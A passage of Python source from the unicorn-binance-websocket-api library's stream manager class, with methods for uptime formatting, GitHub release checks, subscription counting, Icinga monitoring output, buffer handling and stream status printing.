uptime = str(uptime_days) + "d:" + str(uptime_hours) + "h:" + str(int(uptime_minutes)) + "m:" + str(
int(uptime_seconds)) + "s"
elif uptime > (60 * 60):
uptime_hours = int(uptime / (60 * 60))
uptime_minutes = int((uptime - (uptime_hours * (60 * 60))) / 60)
uptime_seconds = int(uptime - ((uptime_hours * (60 * 60)) + (uptime_minutes * 60)))
uptime = str(uptime_hours) + "h:" + str(int(uptime_minutes)) + "m:" + str(int(uptime_seconds)) + "s"
elif uptime > 60:
uptime_minutes = int(uptime / 60)
uptime_seconds = uptime - uptime_minutes * 60
uptime = str(uptime_minutes) + "m:" + str(int(uptime_seconds)) + "s"
else:
uptime = str(int(uptime)) + " seconds"
return uptime
@staticmethod
def get_latest_release_info():
"""
Get infos about the latest available release
:return: dict or False
"""
try:
respond = requests.get('https://api.github.com/repos/oliver-zehentleitner/unicorn-binance-websocket-api/'
'releases/latest')
latest_release_info = respond.json()
return latest_release_info
except Exception:
return False
@staticmethod
def get_latest_release_info_check_command():
"""
Get infos about the latest available `check_lucit_collector` release
:return: dict or False
"""
try:
respond = requests.get('https://api.github.com/repos/LUCIT-Development/check_lucit_collector.py/'
'releases/latest')
return respond.json()
except Exception:
return False
def get_latest_version(self):
"""
Get the version of the latest available release (cache time 1 hour)
:return: str or False
"""
# Do a fresh request if status is None or last timestamp is older 1 hour
if self.last_update_check_github['status'] is None or \
(self.last_update_check_github['timestamp']+(60*60) < time.time()):
self.last_update_check_github['status'] = self.get_latest_release_info()
if self.last_update_check_github['status']:
try:
return self.last_update_check_github['status']["tag_name"]
except KeyError:
return "unknown"
else:
return "unknown"
def get_latest_version_check_command(self):
"""
Get the version of the latest available `check_lucit_collector.py` release (cache time 1 hour)
:return: str or False
"""
# Do a fresh request if status is None or last timestamp is older 1 hour
if self.last_update_check_github_check_command['status'] is None or \
(self.last_update_check_github_check_command['timestamp'] + (60 * 60) < time.time()):
self.last_update_check_github_check_command['status'] = self.get_latest_release_info_check_command()
if self.last_update_check_github_check_command['status']:
try:
return self.last_update_check_github_check_command['status']["tag_name"]
except KeyError:
return "unknown"
else:
return "unknown"
def get_limit_of_subscriptions_per_stream(self):
"""
Get the number of allowed active subscriptions per stream (limit of binance API)
:return: int
"""
return self.max_subscriptions_per_stream
def get_number_of_all_subscriptions(self):
"""
Get the amount of all stream subscriptions
:return: inf
"""
subscriptions = 0
try:
active_stream_list = copy.deepcopy(self.get_active_stream_list())
if active_stream_list:
for stream_id in active_stream_list:
subscriptions += active_stream_list[stream_id]['subscriptions']
self.all_subscriptions_number = subscriptions
except TypeError:
return self.all_subscriptions_number
except RuntimeError:
return self.all_subscriptions_number
return subscriptions
def get_number_of_free_subscription_slots(self, stream_id):
"""
Get the number of free subscription slots (max allowed subscriptions - subscriptions) of a specific stream
:return: int
"""
free_slots = self.max_subscriptions_per_stream - self.stream_list[stream_id]['subscriptions']
return free_slots
def get_listen_key_from_restclient(self, stream_id, api_key, api_secret, symbols=False):
"""
Get a new or cached (<30m) listen_key
:param stream_id: provide a stream_id
:type stream_id: uuid
:param api_key: provide a valid Binance API key
:type api_key: str
:param api_secret: provide a valid Binance API secret
:type api_secret: str
:param symbols: provide the symbols for isolated_margin user_data streams
:type symbols: str
:return: str or False
"""
if (self.stream_list[stream_id]['start_time'] + self.stream_list[stream_id]['listen_key_cache_time']) > \
time.time() or (self.stream_list[stream_id]['last_static_ping_listen_key'] +
self.stream_list[stream_id]['listen_key_cache_time']) > time.time():
# listen_key is not older than 30 min
if self.stream_list[stream_id]['listen_key'] is not False:
response = {'listenKey': self.stream_list[stream_id]['listen_key']}
return response
# no cached listen_key or listen_key is older than 30 min
# acquire a new listen_key:
response = self.restclient.get_listen_key(stream_id)
if response:
# save and return the valid listen_key
try:
self.stream_list[stream_id]['listen_key'] = str(response['listenKey'])
return response
except KeyError:
# no valid listen_key, but a response from endpoint
return response
except TypeError:
return response
else:
# no valid listen_key
return False
def get_most_receives_per_second(self):
"""
Get the highest total receives per second value
:return: int
"""
return self.most_receives_per_second
def get_number_of_streams_in_stream_list(self):
"""
Get the number of streams that are stored in the stream_list
:return: int
"""
return len(self.stream_list)
def get_number_of_subscriptions(self, stream_id):
"""
Get the number of subscriptions of a specific stream
:return: int
"""
count_subscriptions = 0
for channel in self.stream_list[stream_id]['channels']:
if "!" in channel \
or channel == "orders" \
or channel == "accounts" \
or channel == "transfers" \
or channel == "allTickers" \
or channel == "allMiniTickers" \
or channel == "blockheight":
count_subscriptions += 1
continue
else:
for market in self.stream_list[stream_id]['markets']:
if "!" in market \
or market == "orders" \
or market == "accounts" \
or market == "transfers" \
or market == "allTickers" \
or market == "allMiniTickers" \
or market == "blockheight":
count_subscriptions += 1
else:
count_subscriptions += 1
return count_subscriptions
def get_keep_max_received_last_second_entries(self):
"""
Get the number of how much received_last_second entries are stored till they get deleted
:return: int
"""
return self.keep_max_received_last_second_entries
def get_monitoring_status_icinga(self, check_command_version=False, warn_on_update=True):
"""
Get status and perfdata to monitor and collect metrics with ICINGA/Nagios
status: OK, WARNING, CRITICAL
- WARNING: on restarts, available updates
- CRITICAL: crashed streams
perfdata:
- average receives per second since last status check
- average speed per second since last status check
- total received bytes since start
- total received length since start
- stream_buffer size
- stream_buffer length
- reconnects
- uptime
:param check_command_version: is the version of the calling `check_command <https://github.com/LUCIT-Development/check_lucit_collector.py>`_
:type check_command_version: str
:param warn_on_update: set to `False` to disable the update warning
:type warn_on_update: bool
:return: dict (text, time, return_code)
"""
result = self.get_monitoring_status_plain(check_command_version=check_command_version,
warn_on_update=warn_on_update)
if len(result['update_msg']) > 0 or len(result['status_msg']) > 0:
text_msg = " -" + str(result['status_msg']) + str(result['update_msg'])
else:
text_msg = ""
check_message = "BINANCE WEBSOCKETS (" + self.exchange + ") - " + result['status_text'] + ": O:" + \
str(result['active_streams']) + \
"/R:" + str(result['restarting_streams']) + "/C:" + str(result['crashed_streams']) + "/S:" + \
str(result['stopped_streams']) + text_msg + " | " + \
"active streams=" + str(result['active_streams']) + ";;;0 " + \
"average_receives_per_second=" + str(result['average_receives_per_second']) + \
";;;0 current_receiving_speed_per_second=" + str(result['average_speed_per_second']) + \
"KB;;;0 total_received_length=" + str(result['total_received_length']) + "c;;;0 total_" \
"received_size=" + str(result['total_received_mb']) + "MB;;;0 stream_buffer_size=" + \
str(result['stream_buffer_mb']) + "MB;;;0 stream_buffer_length=" + \
str(result['stream_buffer_items']) + ";;;0 reconnects=" + str(result['reconnects']) + "c;;;0 " \
"uptime_days=" + str(result['uptime']) + "c;;;0"
status = {'text': check_message,
'time': int(result['timestamp']),
'return_code': result['return_code']}
return status
def get_monitoring_status_plain(self, check_command_version=False, warn_on_update=True):
"""
Get plain monitoring status data:
active_streams, crashed_streams, restarting_streams, stopped_streams, return_code, status_text,
timestamp, update_msg, average_receives_per_second, average_speed_per_second, total_received_mb,
stream_buffer_items, stream_buffer_mb, reconnects, uptime
:param check_command_version: is the version of the calling `check_command <https://github.com/LUCIT-Development/check_lucit_collector.py>`_
:type check_command_version: False or str
:param warn_on_update: set to `False` to disable the update warning
:type warn_on_update: bool
:return: dict
"""
result = {}
result['active_streams'] = 0
result['crashed_streams'] = 0
result['restarting_streams'] = 0
result['highest_restart_per_stream_last_hour'] = 0
result['return_code'] = 0
result['status_text'] = "OK"
result['status_msg'] = ""
result['stopped_streams'] = 0
result['timestamp'] = time.time()
result['update_msg'] = ""
time_period = result['timestamp'] - self.last_monitoring_check
timestamp_last_hour = time.time() - (60*60)
try:
from unicorn_fy.unicorn_fy import UnicornFy
unicorn_fy = UnicornFy()
is_update_available_unicorn_fy = unicorn_fy.is_update_availabe()
except ModuleNotFoundError:
logging.critical("BinanceWebSocketApiManager.get_monitoring_status_plain() - UnicornFy not installed!")
is_update_available_unicorn_fy = False
except AttributeError:
logging.error("BinanceWebSocketApiManager.get_monitoring_status_plain() - UnicornFy outdated!")
is_update_available_unicorn_fy = True
if check_command_version:
is_update_available_check_command = self.is_update_availabe_check_command(
check_command_version=check_command_version)
else:
is_update_available_check_command = True
for stream_id in self.stream_list:
stream_restarts_last_hour = 0
for reconnect in self.stream_list[stream_id]['logged_reconnects']:
if reconnect > timestamp_last_hour:
stream_restarts_last_hour += 1
if stream_restarts_last_hour > result['highest_restart_per_stream_last_hour']:
result['highest_restart_per_stream_last_hour'] = stream_restarts_last_hour
for stream_id in self.stream_list:
if self.stream_list[stream_id]['status'] == "running":
result['active_streams'] += 1
elif self.stream_list[stream_id]['status'] == "stopped":
result['stopped_streams'] += 1
elif self.stream_list[stream_id]['status'] == "restarting":
result['restarting_streams'] += 1
elif "crashed" in self.stream_list[stream_id]['status']:
result['crashed_streams'] += 1
if self.is_update_availabe() and is_update_available_unicorn_fy and is_update_available_check_command:
result['update_msg'] = " Update available: UNICORN Binance WebSocket API, UnicornFy and " \
"check_lucit_collector.py!"
if warn_on_update is True:
result['status_text'] = "WARNING"
result['return_code'] = 1
elif self.is_update_availabe() and is_update_available_unicorn_fy:
result['update_msg'] = " Update available: UNICORN Binance WebSocket API and UnicornFy"
if warn_on_update is True:
result['status_text'] = "WARNING"
result['return_code'] = 1
elif self.is_update_availabe() and is_update_available_check_command:
result['update_msg'] = " Update available: UNICORN Binance WebSocket API and check_lucit_collector.py!"
if warn_on_update is True:
result['status_text'] = "WARNING"
result['return_code'] = 1
elif is_update_available_unicorn_fy and is_update_available_check_command:
result['update_msg'] = " Update available: UnicornFy and check_lucit_collector.py!"
if warn_on_update is True:
result['status_text'] = "WARNING"
result['return_code'] = 1
elif self.is_update_availabe():
result['update_msg'] = " Update " + str(self.get_latest_version()) + " available!"
if warn_on_update is True:
result['status_text'] = "WARNING"
result['return_code'] = 1
elif is_update_available_unicorn_fy:
result['update_msg'] = " Update UnicornFy " + str(unicorn_fy.get_latest_version()) + " available!"
if warn_on_update is True:
result['status_text'] = "WARNING"
result['return_code'] = 1
elif is_update_available_check_command:
result['update_msg'] = " Update `check_lucit_collector.py` " + \
str(self.get_latest_version_check_command()) + " available!"
if warn_on_update is True:
result['status_text'] = "WARNING"
result['return_code'] = 1
if result['highest_restart_per_stream_last_hour'] >= 10:
result['status_text'] = "CRITICAL"
result['return_code'] = 2
result['status_msg'] = " Restart rate per stream last hour: " + \
str(result['highest_restart_per_stream_last_hour'])
elif result['crashed_streams'] > 0:
result['status_text'] = "CRITICAL"
result['return_code'] = 2
elif result['highest_restart_per_stream_last_hour'] >= 3:
result['status_text'] = "WARNING"
result['return_code'] = 1
result['status_msg'] = " Restart rate per stream last hour: " + \
str(result['highest_restart_per_stream_last_hour'])
result['average_receives_per_second'] = ((self.total_receives - self.monitoring_total_receives) /
time_period).__round__(2)
result['average_speed_per_second'] = (((self.total_received_bytes - self.monitoring_total_received_bytes) /
time_period) / 1024).__round__(2)
result['total_received_mb'] = (self.get_total_received_bytes() / (1024 * 1024)).__round__(2)
result['total_received_length'] = self.total_receives
result['stream_buffer_items'] = str(self.get_stream_buffer_length())
result['stream_buffer_mb'] = (self.get_stream_buffer_byte_size() / (1024 * 1024)).__round__(4)
result['reconnects'] = self.get_reconnects()
self.monitoring_total_receives = self.get_total_receives()
self.monitoring_total_received_bytes = self.get_total_received_bytes()
self.last_monitoring_check = result['timestamp']
result['uptime'] = ((result['timestamp'] - self.start_time) / (60*60*24)).__round__(3)
return result
def get_process_usage_memory(self):
"""
Get the used memory of this process
:return: str
"""
process = psutil.Process(os.getpid())
memory = self.get_human_bytesize(process.memory_info()[0])
return memory
def get_process_usage_cpu(self):
"""
Get the used cpu power of this process
:return: int
"""
try:
cpu = psutil.cpu_percent(interval=None)
except OSError as error_msg:
logging.error(f"BinanceWebSocketApiManager.get_process_usage_cpu() - OSError - error_msg: {str(error_msg)}")
return False
return cpu
def get_process_usage_threads(self):
"""
Get the amount of threads that this process is using
:return: int
"""
threads = threading.active_count()
return threads
def get_reconnects(self):
"""
Get the number of total reconnects
:return: int
"""
return self.reconnects
def get_request_id(self):
"""
Get a unique `request_id`
:return: int
"""
with self.request_id_lock:
self.request_id += 1
return self.request_id
def get_result_by_request_id(self, request_id=False, timeout=10):
"""
Get the result related to the provided `request_id`
:param request_id: if you run `get_stream_subscriptions()
<https://oliver-zehentleitner.github.io/unicorn-binance-websocket-api/unicorn_binance_websocket_api.html#unicorn_binance_websocket_api.unicorn_binance_websocket_api_manager.BinanceWebSocketApiManager.get_stream_subscriptions>`_
it returns a unique `request_id` - provide it to this method to receive the result.
:type request_id: stream_id (uuid)
:param timeout: seconds to wait to receive the result. If not there it returns 'False'
:type timeout: int
:return: `result` or False
"""
if request_id is False:
return False
wait_till_timestamp = time.time() + timeout
while wait_till_timestamp >= time.time():
for result in self.ringbuffer_result:
result_dict = json.loads(result)
if result_dict['id'] == request_id:
return result
return False
def get_results_from_endpoints(self):
"""
Get all the stored result messages from the ringbuffer sent by the endpoints.
:return: list
"""
return self.ringbuffer_result
def get_ringbuffer_error_max_size(self):
"""
How many entries should be stored in the ringbuffer?
:return: int
"""
return self.ringbuffer_error_max_size
def get_ringbuffer_result_max_size(self):
"""
How many entries should be stored in the ringbuffer?
:return: int
"""
return self.ringbuffer_result_max_size
def get_start_time(self):
"""
Get the start_time of the BinanceWebSocketApiManager instance
:return: timestamp
"""
return self.start_time
def get_stream_buffer_byte_size(self):
"""
Get the current byte size estimation of the stream_buffer
:return: int
"""
total_received_bytes = self.get_total_received_bytes()
total_receives = self.get_total_receives()
stream_buffer_length = self.get_stream_buffer_length()
return round(total_received_bytes / total_receives * stream_buffer_length)
def get_stream_buffer_length(self):
"""
Get the current number of items in all stream_buffer
:return: int
"""
number = 0
number += len(self.stream_buffer)
for stream_buffer_name in self.stream_buffers:
number += len(self.stream_buffers[stream_buffer_name])
return number
def get_stream_id_by_label(self, stream_label=False):
"""
Get the stream_id of a specific stream by stream label
:param stream_label: stream_label of the stream you search
:type stream_label: str
:return: stream_id or False
"""
if stream_label:
for stream_id in self.stream_list:
if self.stream_list[stream_id]['stream_label'] == stream_label:
return stream_id
return False
def get_stream_info(self, stream_id):
"""
Get all infos about a specific stream
:param stream_id: id of a stream
:type stream_id: uuid
:return: set
"""
current_timestamp = time.time()
try:
temp_stream_list = copy.deepcopy(self.stream_list[stream_id])
except RuntimeError:
logging.error("BinanceWebSocketApiManager.get_stream_info(" + str(stream_id) + ") Info: RuntimeError")
return self.get_stream_info(stream_id)
except KeyError:
logging.error("BinanceWebSocketApiManager.get_stream_info(" + str(stream_id) + ") Info: KeyError")
return False
if temp_stream_list['last_heartbeat'] is not None:
temp_stream_list['seconds_to_last_heartbeat'] = \
current_timestamp - self.stream_list[stream_id]['last_heartbeat']
if temp_stream_list['has_stopped'] is not False:
temp_stream_list['seconds_since_has_stopped'] = \
int(current_timestamp) - int(self.stream_list[stream_id]['has_stopped'])
try:
self.stream_list[stream_id]['processed_receives_statistic'] = self.get_stream_statistic(stream_id)
except ZeroDivisionError:
pass
self.stream_list[stream_id]['transfer_rate_per_second']['speed'] = self.get_current_receiving_speed(stream_id)
return temp_stream_list
def get_stream_label(self, stream_id=False):
"""
Get the stream_label of a specific stream
:param stream_id: id of a stream
:type stream_id: uuid
:return: str or False
"""
if stream_id:
return self.stream_list[stream_id]['stream_label']
else:
return False
def get_stream_subscriptions(self, stream_id, request_id=False):
"""
Get a list of subscriptions of a specific stream from Binance endpoints - the result can be received via
the `stream_buffer` and is also added to the results ringbuffer - `get_results_from_endpoints()
<https://oliver-zehentleitner.github.io/unicorn-binance-websocket-api/unicorn_binance_websocket_api.html#unicorn_binance_websocket_api.unicorn_binance_websocket_api_manager.BinanceWebSocketApiManager.get_results_from_endpoints>`_
to get all results or use `get_result_by_request_id(request_id)
<https://oliver-zehentleitner.github.io/unicorn-binance-websocket-api/unicorn_binance_websocket_api.html#unicorn_binance_websocket_api.unicorn_binance_websocket_api_manager.BinanceWebSocketApiManager.get_result_by_request_id>`_
to get a specific one!
This function is supported by CEX endpoints only!
Info: https://github.com/binance-exchange/binance-official-api-docs/blob/master/web-socket-streams.md#listing-subscriptions
:param stream_id: id of a stream
:type stream_id: uuid
:param request_id: id to use for the request - use `get_request_id()` to create a unique id. If not provided or
`False`, then this method is using `get_request_id()
<https://oliver-zehentleitner.github.io/unicorn-binance-websocket-api/unicorn_binance_websocket_api.html#unicorn_binance_websocket_api.unicorn_binance_websocket_api_manager.BinanceWebSocketApiManager.get_request_id>`_
automatically.
:type request_id: int
:return: request_id (int)
"""
if request_id is False:
request_id = self.get_request_id()
if self.is_exchange_type('dex'):
logging.error("BinanceWebSocketApiManager.get_stream_subscriptions(" + str(stream_id) + ", " +
str(request_id) + ") DEX websockets dont support the listing of subscriptions! Request not "
"sent!")
return False
elif self.is_exchange_type('cex'):
payload = {"method": "LIST_SUBSCRIPTIONS",
"id": request_id}
self.stream_list[stream_id]['payload'].append(payload)
logging.info("BinanceWebSocketApiManager.get_stream_subscriptions(" + str(stream_id) + ", " +
str(request_id) + ") payload added!")
return request_id
else:
return False
def get_stream_list(self):
"""
Get a list of all streams
:return: set
"""
# get the stream list
temp_stream_list = {}
for stream_id in self.stream_list:
temp_stream_list[stream_id] = self.get_stream_info(stream_id)
return temp_stream_list
def get_stream_receives_last_second(self, stream_id):
"""
Get the number of receives of specific stream from the last seconds
:param stream_id: id of a stream
:type stream_id: uuid
:return: int
"""
last_second_timestamp = int(time.time()) - 1
try:
return self.stream_list[stream_id]['receives_statistic_last_second']['entries'][last_second_timestamp]
except KeyError:
return 0
def get_stream_statistic(self, stream_id):
"""
Get the statistic of a specific stream
:param stream_id: id of a stream
:type stream_id: uuid
:return: set
"""
stream_statistic = {'stream_receives_per_second': 0,
'stream_receives_per_minute': 0,
'stream_receives_per_hour': 0,
'stream_receives_per_day': 0,
'stream_receives_per_month': 0,
'stream_receives_per_year': 0}
if self.stream_list[stream_id]['status'] == "running":
stream_statistic['uptime'] = time.time() - self.stream_list[stream_id]['start_time']
elif self.stream_list[stream_id]['status'] == "stopped":
stream_statistic['uptime'] = self.stream_list[stream_id]['has_stopped'] - self.stream_list[stream_id]['start_time']
elif "crashed" in self.stream_list[stream_id]['status']:
stream_statistic['uptime'] = self.stream_list[stream_id]['has_stopped'] - self.stream_list[stream_id]['start_time']
elif self.stream_list[stream_id]['status'] == "restarting":
stream_statistic['uptime'] = time.time() - self.stream_list[stream_id]['start_time']
else:
stream_statistic['uptime'] = time.time() - self.stream_list[stream_id]['start_time']
try:
stream_receives_per_second = self.stream_list[stream_id]['processed_receives_total'] / stream_statistic['uptime']
except ZeroDivisionError:
stream_receives_per_second = 0
stream_statistic['stream_receives_per_second'] = stream_receives_per_second
if stream_statistic['uptime'] > 60:
stream_statistic['stream_receives_per_minute'] = stream_receives_per_second * 60
if stream_statistic['uptime'] > 60 * 60:
stream_statistic['stream_receives_per_hour'] = stream_receives_per_second * 60 * 60
if stream_statistic['uptime'] > 60 * 60 * 24:
stream_statistic['stream_receives_per_day'] = stream_receives_per_second * 60 * 60 * 24
if stream_statistic['uptime'] > 60 * 60 * 24 * 30:
stream_statistic['stream_receives_per_month'] = stream_receives_per_second * 60 * 60 * 24 * 30
if stream_statistic['uptime'] > 60 * 60 * 24 * 30 * 12:
stream_statistic['stream_receives_per_year'] = stream_receives_per_second * 60 * 60 * 24 * 30 * 12
return stream_statistic
def get_total_received_bytes(self):
"""
Get number of total received bytes
:return: int
"""
# how much bytes did we receive till now?
return self.total_received_bytes
def get_total_receives(self):
"""
Get the number of total receives
:return: int
"""
return self.total_receives
def get_user_agent(self):
"""
Get the user_agent string "lib name + lib version + python version"
:return:
"""
user_agent = f"{self.name}_{str(self.get_version())}-python_{str(platform.python_version())}"
return user_agent
def get_version(self):
"""
Get the package/module version
:return: str
"""
return self.version
def get_version_unicorn_fy(self):
"""
Get the package/module version of `UnicornFy <https://github.com/oliver-zehentleitner/unicorn-fy>`_
:return: str
"""
from unicorn_fy.unicorn_fy import UnicornFy
unicorn_fy = UnicornFy()
return unicorn_fy.get_version()
@staticmethod
def help():
"""
Help in iPython
"""
print("Ctrl+D to close")
def increase_received_bytes_per_second(self, stream_id, size):
"""
Add the amount of received bytes per second
:param stream_id: id of a stream
:type stream_id: uuid
:param size: amount of bytes to add
:type size: int
"""
current_timestamp = int(time.time())
try:
if self.stream_list[stream_id]['transfer_rate_per_second']['bytes'][current_timestamp]:
pass
except KeyError:
self.stream_list[stream_id]['transfer_rate_per_second']['bytes'][current_timestamp] = 0
try:
self.stream_list[stream_id]['transfer_rate_per_second']['bytes'][current_timestamp] += size
except KeyError:
pass
def increase_processed_receives_statistic(self, stream_id):
"""
Add the number of processed receives
:param stream_id: id of a stream
:type stream_id: uuid
"""
current_timestamp = int(time.time())
try:
self.stream_list[stream_id]['processed_receives_total'] += 1
except KeyError:
return False
try:
with self.stream_threading_lock[stream_id]['receives_statistic_last_second_lock']:
self.stream_list[stream_id]['receives_statistic_last_second']['entries'][current_timestamp] += 1
except KeyError:
with self.stream_threading_lock[stream_id]['receives_statistic_last_second_lock']:
self.stream_list[stream_id]['receives_statistic_last_second']['entries'][current_timestamp] = 1
with self.total_receives_lock:
self.total_receives += 1
def increase_reconnect_counter(self, stream_id):
"""
Increase reconnect counter
:param stream_id: id of a stream
:type stream_id: uuid
"""
self.stream_list[stream_id]['logged_reconnects'].append(time.time())
self.stream_list[stream_id]['reconnects'] += 1
with self.reconnects_lock:
self.reconnects += 1
def increase_transmitted_counter(self, stream_id):
"""
Increase the counter of transmitted payloads
:param stream_id: id of a stream
:type stream_id: uuid
"""
self.stream_list[stream_id]['processed_transmitted_total'] += 1
with self.total_transmitted_lock:
self.total_transmitted += 1
def is_manager_stopping(self):
"""
Returns `True` if the manager has a stop request, 'False' if not.
:return: bool
"""
if self.stop_manager_request is None:
return False
else:
return True
def is_exchange_type(self, exchange_type=False):
"""
Check the exchange type!
:param exchange_type: Valid types are `dex` and `cex`!
:type exchange_type: str
:return: bool
"""
if exchange_type is False:
return False
if self.exchange == "binance.org" or \
self.exchange == "binance.org-testnet":
is_type = "dex"
elif self.exchange == "binance.com" or \
self.exchange == "binance.com-testnet" or \
self.exchange == "binance.com-margin" or \
self.exchange == "binance.com-margin-testnet" or \
self.exchange == "binance.com-isolated_margin" or \
self.exchange == "binance.com-isolated_margin-testnet" or \
self.exchange == "binance.com-futures" or \
self.exchange == "binance.com-futures-testnet" or \
self.exchange == "binance.je" or \
self.exchange == "binance.us" or \
self.exchange == "jex.com":
is_type = "cex"
else:
logging.critical(f"BinanceWebSocketApiManager.is_exchange_type() - Can not determine exchange type for"
f"exchange={str(self.exchange)}")
return False
if is_type == exchange_type:
return True
else:
return False
def is_stop_request(self, stream_id, exclude_kill_requests=False):
"""
Has a specific stream a stop_request?
:param stream_id: id of a stream
:type stream_id: uuid
:param exclude_kill_requests: if `True` this method returns `False` on kill_requests
:type exclude_kill_requests: bool
:return: bool
"""
logging.debug("BinanceWebSocketApiManager.is_stop_request(" + str(stream_id) + ")")
try:
if self.stream_list[stream_id]['stop_request'] is True:
return True
elif self.is_manager_stopping():
return True
elif self.stream_list[stream_id]['kill_request'] is True and exclude_kill_requests is False:
return True
else:
return False
except KeyError:
return False
def is_stop_as_crash_request(self, stream_id):
"""
Has a specific stream a stop_as_crash_request?
:param stream_id: id of a stream
:type stream_id: uuid
:return: bool
"""
logging.debug("BinanceWebSocketApiManager.is_stop_as_crash_request(" + str(stream_id) + ")")
try:
if self.stream_list[stream_id]['crash_request'] is True:
return True
except KeyError:
pass
if self.is_manager_stopping():
return True
else:
return False
def is_update_availabe(self):
"""
Is a new release of this package available?
:return: bool
"""
installed_version = self.get_version()
if ".dev" in installed_version:
installed_version = installed_version[:-4]
if self.get_latest_version() == installed_version:
return False
elif self.get_latest_version() == "unknown":
return False
else:
return True
def is_update_availabe_unicorn_fy(self):
"""
Is a new release of `UnicornFy <https://github.com/oliver-zehentleitner/unicorn-fy>`_ available?
:return: bool
"""
from unicorn_fy.unicorn_fy import UnicornFy
unicorn_fy = UnicornFy()
return unicorn_fy.is_update_availabe()
def is_update_availabe_check_command(self, check_command_version=False):
"""
Is a new release of `check_lucit_collector.py` available?
:return: bool
"""
installed_version = check_command_version
latest_version = self.get_latest_version_check_command()
if ".dev" in str(installed_version):
installed_version = installed_version[:-4]
if latest_version == installed_version:
return False
elif latest_version == "unknown":
return False
else:
return True
def kill_stream(self, stream_id):
"""
Kill a specific stream
:param stream_id: id of a stream
:type stream_id: uuid
:return: bool
"""
# stop a specific stream by stream_id
logging.info("BinanceWebSocketApiManager.kill_stream(" + str(stream_id) + ")")
self.stream_list[stream_id]['kill_request'] = True
def pop_stream_data_from_stream_buffer(self, stream_buffer_name=False):
"""
Get oldest entry from
`stream_buffer <https://github.com/oliver-zehentleitner/unicorn-binance-websocket-api/wiki/%60stream_buffer%60>`_
and remove from stack (FIFO stack)
:param stream_buffer_name: `False` to read from generic stream_buffer, the stream_id if you used True in
create_stream() or the string name of a shared stream_buffer.
:type stream_buffer_name: bool or str
:return: stream_data - str, dict or False
"""
if stream_buffer_name is False:
try:
with self.stream_buffer_lock:
stream_data = self.stream_buffer.pop(0)
return stream_data
except IndexError:
return False
else:
try:
with self.stream_buffer_locks[stream_buffer_name]:
stream_data = self.stream_buffers[stream_buffer_name].pop(0)
return stream_data
except IndexError:
return False
except KeyError:
return False
def pop_stream_signal_from_stream_signal_buffer(self):
"""
Get oldest entry from
`stream_signal_buffer <https://github.com/oliver-zehentleitner/unicorn-binance-websocket-api/wiki/%60stream_signal_buffer%60>`_
and remove from stack (FIFO stack)
:return: stream_signal - dict or False
"""
try:
with self.stream_signal_buffer_lock:
stream_signal = self.stream_signal_buffer.pop(0)
return stream_signal
except IndexError:
return False
def print_stream_info(self, stream_id, add_string=""):
"""
Print all infos about a specific stream, helps debugging :)
:param stream_id: id of a stream
:type stream_id: uuid
:param add_string: text to add to the output
:type add_string: str
:return: bool
"""
restart_requests_row = ""
binance_api_status_row = ""
stream_label_row = ""
status_row = ""
payload_row = ""
symbol_row = ""
dex_user_address_row = ""
last_static_ping_listen_key = ""
stream_info = self.get_stream_info(stream_id)
stream_row_color_prefix = ""
stream_row_color_suffix = ""
if len(add_string) > 0:
add_string = " " + str(add_string) + "\r\n"
try:
if len(self.stream_list[stream_id]['logged_reconnects']) > 0:
logged_reconnects_row = "\r\n logged_reconnects: "
row_prefix = ""
for timestamp in self.stream_list[stream_id]['logged_reconnects']:
logged_reconnects_row += row_prefix + \
datetime.utcfromtimestamp(timestamp).strftime('%Y-%m-%d, %H:%M:%S UTC')
row_prefix = ", "
else:
logged_reconnects_row = ""
except KeyError:
return False
if "running" in stream_info['status']:
stream_row_color_prefix = "\033[1m\033[32m"
stream_row_color_suffix = "\033[0m\r\n"
for reconnect_timestamp in self.stream_list[stream_id]['logged_reconnects']:
if (time.time() - reconnect_timestamp) < 2:
stream_row_color_prefix = "\033[1m\033[33m"
stream_row_color_suffix = "\033[0m\r\n"
status_row = stream_row_color_prefix + " status: " + str(stream_info['status']) + stream_row_color_suffix
elif "crashed" in stream_info['status']:
stream_row_color_prefix = "\033[1m\033[31m"
stream_row_color_suffix = "\033[0m\r\n"
status_row = stream_row_color_prefix + " status: " + str(stream_info['status']) + stream_row_color_suffix
elif "restarting" in stream_info['status']:
stream_row_color_prefix = "\033[1m\033[33m"
stream_row_color_suffix = "\033[0m\r\n"
status_row = stream_row_color_prefix + " status: " + str(stream_info['status']) + stream_row_color_suffix
elif "stopped" in stream_info['status']:
stream_row_color_prefix = "\033[1m\033[33m"
stream_row_color_suffix = "\033[0m\r\n"
status_row = stream_row_color_prefix + " status: " + str(stream_info['status']) + stream_row_color_suffix
try:
if self.restart_requests[stream_id]['status']:
restart_requests_row = " restart_request: " + self.restart_requests[stream_id]['status'] + "\r\n"
except KeyError:
pass
if self.stream_list[stream_id]['markets'] == "!userData":
last_static_ping_listen_key = " last_static_ping_listen_key: " + \
str(self.stream_list[stream_id]['last_static_ping_listen_key']) + "\r\n"
if self.binance_api_status['status_code'] == 200:
binance_api_status_code = str(self.binance_api_status['status_code'])
elif self.binance_api_status['status_code'] == 418:
binance_api_status_code = "\033[1m\033[31m" + str(self.binance_api_status['status_code']) + "\033[0m"
else:
binance_api_status_code = "\033[1m\033[33m" + str(self.binance_api_status['status_code']) + "\033[0m"
binance_api_status_row = " binance_api_status: used_weight=" + str(self.binance_api_status['weight']) + \
", status_code=" + str(binance_api_status_code) + " (last update " + \
str(datetime.utcfromtimestamp(
self.binance_api_status['timestamp']).strftime('%Y-%m-%d, %H:%M:%S UTC')) + \
")\r\n"
current_receiving_speed = str(self.get_human_bytesize(self.get_current_receiving_speed(stream_id), "/s"))
if self.stream_list[stream_id]['symbols'] is not False:
symbol_row = " symbols:" + str(stream_info['symbols']) + "\r\n"
if self.stream_list[stream_id]["payload"]:
payload_row = " payload: " + str(self.stream_list[stream_id]["payload"]) + "\r\n"
if self.stream_list[stream_id]["dex_user_address"] is not False:
dex_user_address_row = " user_address: " + str(self.stream_list[stream_id]["dex_user_address"]) + "\r\n"
if self.stream_list[stream_id]["stream_label"] is not None:
stream_label_row = " stream_label: " + self.stream_list[stream_id]["stream_label"] + "\r\n"
if isinstance(stream_info['ping_interval'], int):
ping_interval = f"{stream_info['ping_interval']} seconds"
else:
ping_interval = stream_info['ping_interval']
if isinstance(stream_info['ping_timeout'], int):
ping_timeout = f"{stream_info['ping_timeout']} seconds"
else:
ping_timeout = stream_info['ping_timeout']
if isinstance(stream_info['close_timeout'], int):
close_timeout = f"{stream_info['close_timeout']} seconds"
else:
close_timeout = stream_info['close_timeout']
try:
uptime = self.get_human_uptime(stream_info['processed_receives_statistic']['uptime'])
